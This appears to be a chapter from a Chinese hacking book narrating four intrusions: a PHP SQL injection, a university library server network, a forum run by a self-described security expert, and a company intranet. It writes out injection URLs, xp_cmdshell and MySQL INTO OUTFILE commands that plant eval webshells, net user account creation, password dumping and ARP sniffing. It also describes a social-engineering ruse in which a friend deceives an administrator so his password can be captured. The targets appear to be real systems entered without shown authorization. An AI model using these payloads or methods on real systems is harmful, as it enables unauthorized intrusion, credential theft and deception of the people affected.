第八章網(wǎng)絡(luò)攻擊實(shí)例8.1一次PHP注入的過(guò)程8.2對(duì)圖書館系統(tǒng)的滲透8.3社會(huì)工程學(xué)的利用8.4滲透某公司內(nèi)部網(wǎng)絡(luò) 8.1一次PHP注入的過(guò)程

PHP注入的方法在第五章中已經(jīng)進(jìn)行了介紹，下面來(lái)看一個(gè)實(shí)例。這次攻擊過(guò)程是筆者在研究之余對(duì)目標(biāo)網(wǎng)站進(jìn)行的一次安全檢測(cè)，僅供教學(xué)研究之用。

存在漏洞的頁(yè)面為：

http://www.***./show_news.php?id=6076

用經(jīng)典方法測(cè)試，提交：

http://www.***./show_news.php?id=6076‘

返回錯(cuò)誤信息，如圖8-1所示。圖8-1錯(cuò)誤信息提示接著提交：

http://www.***./show_news.php?id=6076and1=1/*

返回正常頁(yè)面，如圖8-2所示。再提交：

http://www.***./show_news.php?id=6076and1=2/*返回錯(cuò)誤提示：“您所請(qǐng)求的數(shù)據(jù)不存在”(說(shuō)明查詢沒有成功)，如圖8-3所示。這下就可以確定是存在PHP注入漏洞的。確定漏洞后首先提交：

http://www.***./show_news.php?id=6076andord(mid(version(),1,1))>51/*返回正常頁(yè)面(如圖8-2所示)，說(shuō)明MySQL是4.0以上版本，接下來(lái)就可以用union查詢了。

接著利用orderby把字段數(shù)猜測(cè)出來(lái)。提交：

http://www.***./show_news.php?id=6076orderby15/*返回錯(cuò)誤，可以判斷此語(yǔ)句的字段數(shù)在10到15之間。

到這里還要利用union查詢來(lái)確定準(zhǔn)確的字段數(shù)。提交：

http://www.***./show_news.php?id=6076and1=2unionselect1,2,3,4,5,6,7,8,9,10,11/*返回結(jié)果如圖8-4所示。說(shuō)明我們猜到了準(zhǔn)確的字段數(shù)是11。接下來(lái)看這個(gè)數(shù)據(jù)庫(kù)連接賬號(hào)有沒有文件讀寫權(quán)限。提交：

http://www.***./show_news.php?id=6076and(selectcount(*)fromMySQL.user)>0/*

結(jié)果返回錯(cuò)誤，那我們只能從猜解管理員賬號(hào)密碼，然后登錄后臺(tái)來(lái)打算了。

后面的事情好像都很順利，首先猜存放管理員賬號(hào)密碼的表是user，提交：

http://www.***.//show_news.php?id=6076and1=2unionselect1,2,3,4,5,6,7,8,9,10,11fromuser/*

返回和圖8-4一樣的結(jié)果，也就是返回正常，一猜即中，說(shuō)明存在user這個(gè)表。

知道了表就是猜字段了，提交：

http://www.***./****news/show_news.php?id=6076and1=2unionselect1,username,3,4,5,6,7,8,9,10,11fromuser/*這個(gè)時(shí)候才想起來(lái)，剛才只顧猜得高興了，居然忘了先找后臺(tái)，犯了一個(gè)低級(jí)失誤。

馬上去猜，但是在根目錄和子目錄都加上admin、manage等地址都是不存在，利用Google也沒有什么突破，暫時(shí)陷入了困境。就在這個(gè)時(shí)候偶然發(fā)現(xiàn)首頁(yè)新聞圖片地址是http://www.***./****cmi/Upload/1.jpg，有點(diǎn)奇怪：一般上傳的圖片文件名都是程序隨機(jī)生成的，而這張圖片卻不是。思路一下又來(lái)了，這個(gè)目錄是上傳圖片的保存目錄，那么就是管理目錄？去掉后面的子目錄，只剩http://www.***./****cmi/，果然后臺(tái)管

理出來(lái)了！趕緊用剛才的用戶名和密碼登錄，成功進(jìn)入接下來(lái)的事情就是找上傳圖片的地方，上傳一個(gè)phpshell就拿到了Web的權(quán)限。這是一次基本的PHP注入過(guò)程，其中包含了探測(cè)環(huán)境、猜解密碼、猜解登錄后臺(tái)等過(guò)程。可以說(shuō)是麻雀雖小，五臟俱全。讀者可以看出，實(shí)際攻擊和預(yù)先的構(gòu)想是存在很大差

距的，比如攻擊最后的尋找后臺(tái)，管理員的后臺(tái)地址不是常用的，應(yīng)該怎么辦？或者說(shuō)在猜解表段字段的時(shí)候，發(fā)現(xiàn)字段名并不是常用的那些，應(yīng)該如何去猜解？這些都是在實(shí)際

攻擊過(guò)程中經(jīng)常遇到的問題。同時(shí)也可以看出如果把程序?qū)懙梅浅Ｒ?guī)范化，比如修改字段名、修改管理入口等也能為程序的安全提供一些保障。但是追其根源還是因?yàn)槌绦驅(qū)τ脩?/p>

的輸入沒有進(jìn)行有效的過(guò)濾，導(dǎo)致了SQL注入漏洞的產(chǎn)生，從而使得網(wǎng)站被輕易地取得控制權(quán)限，所以還是應(yīng)該在接受用戶輸入的時(shí)候就進(jìn)行嚴(yán)格的過(guò)濾才能保證更加安全。 8.2對(duì)圖書館系統(tǒng)的滲透

這是筆者對(duì)某高校圖書館系統(tǒng)進(jìn)行的一次安全檢測(cè)，其中包含了注入、掃描、嗅探等滲透常用技術(shù)，是一個(gè)完整的滲透過(guò)程，也基本列出了實(shí)際入侵中會(huì)遇到的問題。

圖書館的借書、還書都是通過(guò)一款軟件寫入數(shù)據(jù)庫(kù)服務(wù)器的，而且還可以通過(guò)Web的方式查詢自己的借書情況，能拿下那個(gè)Web查詢系統(tǒng)就基本可以控制圖書館的數(shù)據(jù)庫(kù)了。

直入主題，找到圖書信息查詢系統(tǒng)，也就是OPAC，界面很友好，功能也很強(qiáng)大，就是不知道安全性如何。程序是PHP寫的，首先還是嘗試注入吧，PHP注入還是很有殺傷

力的。找了個(gè)連接加“'”返回空白頁(yè)面(如圖8-7所示)?；剡^(guò)頭來(lái)看圖書館的其他服務(wù)，有隨書光盤系統(tǒng)，有論文提交系統(tǒng)，嘗試從這兩個(gè)地方尋找突破口，發(fā)現(xiàn)光盤系統(tǒng)的一個(gè)連接：

http://210.*.*.133:8080/sub-item-cell.asp?BookID=‘4446’

參數(shù)被引號(hào)引起來(lái)了，直接加and1=1是返回錯(cuò)誤，難道不能注入？好像有點(diǎn)不對(duì)，把兩邊的引號(hào)去掉再試，直接提交：

http://210.*.*.133:8080/sub-item-cell.asp?BookID=4446and1=1

返回正常，如圖8-9所示。圖8-10得到出錯(cuò)位置原來(lái)這里接收了BooKID后是沒有對(duì)數(shù)據(jù)進(jìn)行處理就帶入查詢的，那我們就不客氣了，放到工具里面跑就是了。結(jié)果很快就出來(lái)了，看來(lái)運(yùn)氣不錯(cuò)，是SA權(quán)限。接下來(lái)的事情就很輕松了，找到Web目錄，用xp-cmdshell執(zhí)行命令寫入WebShelll還是差異備份都一樣。我這里因?yàn)榉奖憔椭苯訄?zhí)行：

echo^<^%evalrequest(chr(35))%^>^>d:\WEB\tc.asp

這樣Web目錄下的tc.asp就是我的shell了，如圖8-11所示。注意這里的^>^是因?yàn)閑cho會(huì)把>當(dāng)作寫入結(jié)束，所以需要替換。在寫入的時(shí)候因?yàn)榉?wù)器的配置不同還可能出現(xiàn)%無(wú)法解析的問題，這個(gè)時(shí)候只要把%替換成%25就可以了。

因?yàn)槭荢A權(quán)限，所以不用擔(dān)心提權(quán)的問題，直接添加了管理員賬戶然后上傳3389.exe，開啟3389端口。服務(wù)器重啟后連上去就進(jìn)入圖書館的服務(wù)器群內(nèi)部了，如圖8-12所示。拿到系統(tǒng)權(quán)限之后，因?yàn)樗湍繕?biāo)主機(jī)是同一網(wǎng)段，所以首先用tracert命令跟蹤210.*.*.149，沒想到管理員居然劃分了虛擬子網(wǎng)，嗅探也不行了。再考慮看能不能從硬盤里面翻出有用的密碼文件，經(jīng)過(guò)一會(huì)的信息收集得到了以下密碼：SA密碼(從數(shù)據(jù)庫(kù)連接文件中獲取的)、管理員賬號(hào)administrator的密碼(因?yàn)楣芾韱T登錄后沒有注銷，所以

用findpass從內(nèi)存里面讀出來(lái)的)。得到幾個(gè)密碼后掃描一下這個(gè)網(wǎng)段的服務(wù)器，得到如下信息：

210.*.*.130，開放了80、135端口；

210.*.*.134，開放了80、1433端口；

210.*.*.149，開放了80端口(這臺(tái)就是圖書信息查詢系統(tǒng)，也就是目標(biāo)主機(jī))現(xiàn)在馬上就想到了利用社會(huì)工程學(xué)嘗試是否有相同口令。第一步：用得到的SA密碼嘗試連接210.*.*.134的1433端口，很幸運(yùn)成功了，如圖8-13所示。接著用同樣的方法添加賬戶，開啟3389端口，就不多說(shuō)了。第二步：用得到的管理員密碼嘗試和210.*.*.130建立IPC連接，結(jié)果操作失敗。正準(zhǔn)備放棄的時(shí)候想到有個(gè)叫做Recton的工具，它不依賴IPC，只要主機(jī)開放135端口和WMI服務(wù)即可，何不用它試試？

結(jié)果發(fā)現(xiàn)兩臺(tái)服務(wù)器的administrator賬戶密碼是一樣的，如圖8-14所示，連接成功后不一會(huì)兒也登錄上了它的3389。到這個(gè)時(shí)候該總結(jié)下了，現(xiàn)在圖書館的四臺(tái)服務(wù)器已經(jīng)拿到了三臺(tái)，只剩目標(biāo)主機(jī)210.*.*.149了。目標(biāo)主機(jī)只開了80端口，看起來(lái)是對(duì)它毫無(wú)辦法了。這個(gè)時(shí)候無(wú)意之中

分別看了下三臺(tái)服務(wù)器的IP情況，居然發(fā)現(xiàn)其中210.*.*.134的網(wǎng)關(guān)和210.*.*.130、210.*.*.133是不一樣的，難道它和210.*.*.149在同一個(gè)子網(wǎng)內(nèi)？報(bào)著試一下的態(tài)度，執(zhí)行tracert命令跟蹤210.*.*.149，直接返回了210.*.*.149，說(shuō)明是可以嗅探的。

上傳了圖形界面的工具Cain，這里照顧一下沒有接觸過(guò)的新手，先簡(jiǎn)單介紹下Cain配置：安裝完畢以后，它會(huì)提示選擇使用的網(wǎng)卡，因?yàn)榉?wù)器一般都有兩塊網(wǎng)卡，所以這里要注意是選擇210.*.*.134所在的這塊，如圖8-15所示。

8.3社會(huì)工程學(xué)的利用

筆者曾對(duì)一個(gè)自稱是由安全專家建立的網(wǎng)站做過(guò)一次安全測(cè)試，其過(guò)程并不復(fù)雜，但是用到了一些社會(huì)工程學(xué)的技巧。

先瀏覽他的網(wǎng)站，是用Discuz!4.1.0創(chuàng)建的論壇。已經(jīng)知道了管理員就肯定要摸清楚他的底細(xì)，畢竟社會(huì)工程學(xué)還是很重要的。首先從他在論壇里面填的個(gè)人資料中收集到了QQ、E-mail、Blog等個(gè)人信息，馬上有了一個(gè)思路，首先破解其Blog密碼，然后再看是不是和他論壇的密碼一樣，這個(gè)就是所謂的社會(huì)工程學(xué)了。他的Blog是用Oblog程序建立的，登錄Google搜索Oblog的漏洞，找到了一個(gè)3.0版的漏洞，滿懷希望地試了，結(jié)果被管理員補(bǔ)了，郁悶！正準(zhǔn)備放棄，忽然發(fā)現(xiàn)這個(gè)服務(wù)

站不止有Blog服務(wù)，還有新聞系統(tǒng)，并且采用的是雷馳新聞系統(tǒng)，在網(wǎng)上搜索到了這套系統(tǒng)的代碼，仔細(xì)研讀后發(fā)現(xiàn)了一個(gè)上傳漏洞可以獲取Webshell。漏洞是這樣的，

uploadPic.inc.asp文件沒有對(duì)訪問權(quán)限進(jìn)行限制，任意用戶都可以訪問此文件，并且出現(xiàn)了過(guò)濾不嚴(yán)的上傳漏洞，漏洞代碼如下：

http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp，然后在上傳文件里面填入要傳的圖片格式的ASP木馬，就可以在uppic目錄下上傳名為

test.asp的文件。通過(guò)此方法很快就獲取了Webshell，跳轉(zhuǎn)到Blog的目錄。激動(dòng)地去下載Blog程序的數(shù)據(jù)庫(kù)看他的密碼，是16位MD5的，嘗試破解但沒有成功。這個(gè)思路被堵死了，滲透陷入了死胡同。

在沒有思路的情況下只好去掃描他的服務(wù)器。用Ping命令查詢域名對(duì)應(yīng)的IP，得到*.*.*.155。打開X-Scan工具進(jìn)行端口掃描，很快出來(lái)了結(jié)果，只開了21和80，估計(jì)是開了防火墻過(guò)濾。實(shí)在沒有辦法了，只能試試嗅探。只要拿下同一子網(wǎng)的一臺(tái)就可以嗅探了。想到就做，又用X-Scan對(duì)它的整個(gè)子網(wǎng)進(jìn)行了掃描，等了大約10多分鐘結(jié)果出來(lái)了，果然有漏洞的機(jī)器很多，最嚴(yán)重的一臺(tái)*.*.*.154直接是SA空口令，就選它了。相信針對(duì)SA空口令的入侵大家不會(huì)陌生吧，這里就簡(jiǎn)單描述一下。用SQLTool工具輸入IP和用戶就可以連接到這臺(tái)服務(wù)器，因?yàn)槭荢A權(quán)限，拿下的方法很多，我是開啟了3389端口然后添加管理員賬戶上去的。連接到*.*.*.154這臺(tái)服務(wù)器的3389，首先用Tracert命令跟蹤*.*.*.155，直接返回了地址，說(shuō)明有希望。我上傳了一個(gè)圖形化的嗅探工具Cain，這個(gè)工具針對(duì)80定義的字段嗅探是相當(dāng)準(zhǔn)確的，打開工具選好目標(biāo)機(jī)和網(wǎng)關(guān)就可以開始嗅探了。大家可能會(huì)想到要是管理員一直不登錄怎么辦？我也想到了。所以我又用到了一個(gè)辦法，叫一個(gè)認(rèn)識(shí)他的朋友去告訴他網(wǎng)站出了問題，不能登錄了。這個(gè)辦法很有效果，一會(huì)兒就成功抓到了他登錄論壇的賬戶和密碼。終于松了一口氣，就等著他下線去登錄了。

晚上10點(diǎn)多，看他不在，趕緊輸入用戶密碼登錄，成功！但是進(jìn)了后臺(tái)才發(fā)現(xiàn)不知道怎么通過(guò)Discuz!4.1.0的后臺(tái)獲取Shell，查了半天資料也沒有結(jié)果，又?jǐn)嗔怂悸?。難道真的沒有辦法成功嗎？實(shí)在沒有辦法，又去看掃描報(bào)告，希望能再找出點(diǎn)可以利用的信息，仔細(xì)看了一遍，還是沒有發(fā)現(xiàn)什么特別的，但是一個(gè)提示其中包含的PhPMyAdmin引起了我的注意。在瀏覽器里面輸入他的IP，然后在后面加上PhPMyAdmin目錄，果然是裝了PhPMyAdmin，不過(guò)要密碼。怎么辦呢？管他呢！拿先前嗅探到的密碼嘗試登陸，成功！看了下他的數(shù)據(jù)庫(kù)是用root賬號(hào)連接的，那還有什么問題呢？直接就拿下了嘛！查看phpinfo知道了Web的物理路徑是D:\www，這下就可以用MySQL導(dǎo)出一個(gè)Webshell到Web目錄了。首先選擇test數(shù)據(jù)庫(kù)執(zhí)行：

createtablea(cmdtext);//建立一個(gè)表和一個(gè)字段

然后執(zhí)行：

INSERTINTOa(cmd)VALUES(‘＜?fputs(fopen(“./a.php”,“w”),“<?phpeval($_POST[cmd]);?>"?＞')//插入一句話木馬到字段中接著執(zhí)行：

selectcmdfromaintooutfile'd:\www\b.php'//導(dǎo)出文件為b.php最后不要忘了刪除表：

DROPTABLEa這樣就得到了Webshell。本來(lái)應(yīng)該到此為止，但是想到是安全專家的服務(wù)器，我又希望能得到更高的權(quán)限，所以就接著進(jìn)行提權(quán)。首先嘗試執(zhí)行命令netuser，成功，又執(zhí)行

netuserheiluoboheiluobo/add，居然也成功了。原來(lái)Apache在Windows環(huán)境下默認(rèn)安裝是系統(tǒng)權(quán)限都沒有改掉，直接就可以得到系統(tǒng)權(quán)限。

這次滲透比較艱難，用了這么多方法和思路才拿到了Webshell，同時(shí)過(guò)程中也對(duì)社會(huì)工程學(xué)進(jìn)行了很多的運(yùn)用，就是靠管理員的疏忽才得到最后的管理權(quán)限的。 8.4滲透某公司內(nèi)部網(wǎng)絡(luò)

很多人認(rèn)為那些大的門戶網(wǎng)站安全性一定很好，但事實(shí)上很多大網(wǎng)站因?yàn)榉秶珡V，很難避免出現(xiàn)漏洞。下面就是對(duì)一家大型公司網(wǎng)站進(jìn)行的滲透，結(jié)果很輕松地拿下了內(nèi)部

網(wǎng)絡(luò)很多服務(wù)器。

入手點(diǎn)是一個(gè)分站的注入，是SA權(quán)限，首先確定數(shù)據(jù)庫(kù)和Web程序是否分離。執(zhí)行命令Ping我自己，結(jié)果顯示防火墻報(bào)警的IP和網(wǎng)站IP相同，就確定了它的數(shù)據(jù)庫(kù)和Web在一臺(tái)服務(wù)器上。開始的想法是直接執(zhí)行命令，加賬戶，開3389，然后登錄，但是沒有想到遇到了點(diǎn)問題。因?yàn)槊顭o(wú)法回顯，始終不知道3389到底開了沒有，反正就是連接不上，那就只有退而求其次，拿個(gè)Webshell再說(shuō)。換到教主工具的執(zhí)行命令功能，向Web目錄寫一句話木馬。很快拿海洋的客戶端連接上了，進(jìn)去之后發(fā)現(xiàn)基本沒有經(jīng)過(guò)安全配置，可以進(jìn)行任何操作，執(zhí)行netstat-na命令查看連接情況，居然發(fā)現(xiàn)3389是監(jiān)聽的，那為什么剛才我連接不上呢？偶然看了下服務(wù)器信